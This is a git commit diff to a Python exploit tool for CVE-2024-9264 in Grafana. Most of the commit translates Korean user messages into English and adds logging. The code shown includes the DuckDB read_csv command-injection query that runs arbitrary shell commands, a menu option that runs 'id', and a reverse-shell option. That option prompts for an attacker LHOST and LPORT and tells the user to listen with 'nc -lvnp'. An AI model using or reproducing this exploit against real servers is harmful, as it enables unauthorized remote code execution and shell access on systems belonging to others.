CVE-2024-9264 Module Modified

2025-10-07 10:23:45 +00:00
parent af32ef356a
commit 9acb2ae04a
1 changed files with 39 additions and 34 deletions
--- a/CVE-2024-9264/exploit.py
+++ b/CVE-2024-9264/exploit.py
@@ -79,7 +79,7 @@ class GrafanaExploit:
                    if "buildInfo" in data and "version" in data["buildInfo"]:
                        return data["buildInfo"]["version"]
            except Exception as e:
-                error(f"버전 확인 실패: {e}")
+                error(f"Version Check Failed: {e}")
        return "Unknown"
    def login(self) -> bool:
@@ -91,7 +91,7 @@ class GrafanaExploit:
            if r.status_code == 200 and "Logged in" in r.text:
                return True
        except Exception as e:
-            error(f"로그인 실패: {e}")
+            error(f"Login Failed: {e}")
        return False
    def run_query(self, query: str) -> Optional[List[Any]]:
@@ -151,19 +151,19 @@ class GrafanaExploit:
            f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')"
        )
        self.run_query(query)
-        return self.read_remote_file(tmp_file)
+        return None
 # -------------------------
 # 메뉴 실행
 # -------------------------
 def menu():
-    print("\n[ 메뉴 ]")
+    print("\n[ Menu ]")
-    print("1) 버전 탐색")
+    print("1) Version Check")
-    print("2) 취약한 버전과 비교")
+    print("2) Vuln Check")
-    print("3) 익스플로잇 (id 실행)")
+    print("3) Exploit")
-    print("4) 리버스 셸 획득")
+    print("4) Exploit with Reverse Shell")
-    print("5) 나가기")
+    print("5) Exit")
 if __name__ == "__main__":
    if len(sys.argv) < 2:
@@ -171,6 +171,7 @@ if __name__ == "__main__":
        sys.exit(1)
    url = sys.argv[1]
    info("Taget URL: " + url)
    exploit = GrafanaExploit(url)
    while True:
@@ -178,14 +179,15 @@ if __name__ == "__main__":
        choice = input(">> ")
        if choice == "1":
-            info("Grafana 버전 확인 중...")
+            log_event("Version Check Started")
            info("Checking Grafana Version...")
            ver = exploit.get_version()
-            print("Grafana Version:", ver)
+            vuln("Grafana Version: " + ver)
        elif choice == "2":
-            info("취약 버전 리스트와 비교 중...")
+            log_event("Vuln Check Started")
            ver = exploit.get_version()
-            print("현재 Grafana Version:", ver)
+            info("Current Grafana Version: " + ver)
            # CVE-2024-9264 영향/패치 버전 목록
            patched_versions = [
@@ -204,48 +206,51 @@ if __name__ == "__main__":
                min_patched = min(Version(v) for v in patched_versions)
                if curr < vs:
-                    success(f"{ver} 은 11.0.0 이전 버전으로, CVE-2024-9264 영향 없음.")
+                    success(f"{ver} is not vulnerable to CVE-2024-9264")
                elif curr >= min_patched:
-                    success(f"{ver} 은 패치된 버전 이상입니다. 취약하지 않을 가능성이 높습니다.")
+                    success(f"{ver} is not vulnerable to CVE-2024-9264")
                else:
-                    vuln(f"{ver} 은 CVE-2024-9264에 취약합니다. 즉시 업그레이드 필요!")
+                    vuln(f"{ver} is vulnerable to CVE-2024-9264")
            except InvalidVersion:
-                error(f"버전 파싱 실패: {ver}")
+                error(f"Version parse failed: {ver}")
        elif choice == "3":
-            info("로그인 시도...")
+            log_event("Exploit Started")
            info("Trying to Login...")
            if exploit.login():
-                success("로그인 성공")
+                success("Login Success")
-                info("PoC 실행 (id)...")
+                info("Exploit...")
                output = exploit.check_vuln()
                if output:
-                    vuln("취약점 확인됨 (id 결과):")
+                    vuln("Exploit Success (id Result):")
                    print(output.decode(errors="ignore"))
                else:
-                    success("취약점 동작 안 함")
+                    success("Exploit is not working")
            else:
-                error("로그인 실패")
+                error("Login Failed")
        elif choice == "4":
-            info("리버스 셸 시도...")
+            log_event("Exploit with Reverse Shell Started")
            info("Trying to Get Reverse Shell...")
            if exploit.login():
-                success("로그인 성공")
+                success("Login Success")
-                lhost = input("공격자 IP (LHOST): ")
+                lhost = input("Attacker IP (LHOST): ")
-                lport = input("공격자 PORT (LPORT): ")
+                lport = input("Attacker PORT (LPORT): ")
                try:
                    lport = int(lport)
-                    info(f"리버스 셸 연결 시도 ({lhost}:{lport})")
+                    info(f"Trying to Connect Reverse Shell ({lhost}:{lport})")
-                    print(Fore.YELLOW + f"[!] 공격자 측에서 `nc -lvnp {lport}` 실행 중이어야 합니다.")
+                    info(f"Attacker must be running `nc -lvnp {lport}` Command")
                    exploit.reverse_shell(lhost, lport)
-                    vuln("리버스 셸 페이로드 전송 완료.")
+                    vuln("Reverse Shell Query Transmission Success.")
                except Exception as e:
-                    error(f"리버스 셸 실행 오류: {e}")
+                    error(f"Reverse Shell not working: {e}")
            else:
-                error("로그인 실패")
+                error("Login Failed")
        elif choice == "5":
-            info("프로그램 종료")
+            log_event("Exit Started")
            info("Exiting...")
            break
        else:
-            error("잘못된 입력")
+            error("Wrong Input")